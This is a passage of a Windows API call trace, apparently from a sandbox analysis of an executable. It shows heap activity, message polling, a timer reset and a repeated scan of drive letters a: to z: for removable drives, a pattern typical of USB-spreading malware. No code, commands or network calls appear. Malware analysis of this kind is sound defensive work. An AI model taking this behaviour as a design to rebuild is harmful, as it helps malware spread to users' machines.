(HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.430] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.431] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.431] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0215.431] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0215.431] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.431] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.432] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.432] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.432] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.432] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.432] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.432] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.432] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.432] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.433] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.433] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.434] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.434] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.434] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.434] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.435] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.436] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.436] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.436] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.436] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.437] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.437] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.437] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.437] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0215.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0215.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.438] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.438] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.438] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.438] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.438] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.438] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0215.438] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.438] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0215.439] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0215.439] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.439] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.439] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0215.439] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0215.439] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.439] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.439] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0215.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.440] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.440] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.440] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.440] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.440] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.440] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.440] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.441] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.441] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.441] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.441] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.441] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.442] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.443] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.452] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.453] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.453] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.453] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0215.454] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0215.454] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.454] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.454] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0215.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.455] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.455] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.455] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.455] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.455] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.456] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.456] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.456] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.456] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.456] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.457] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.458] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.459] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.459] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.459] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.459] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.459] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.460] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.460] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.460] HeapFree 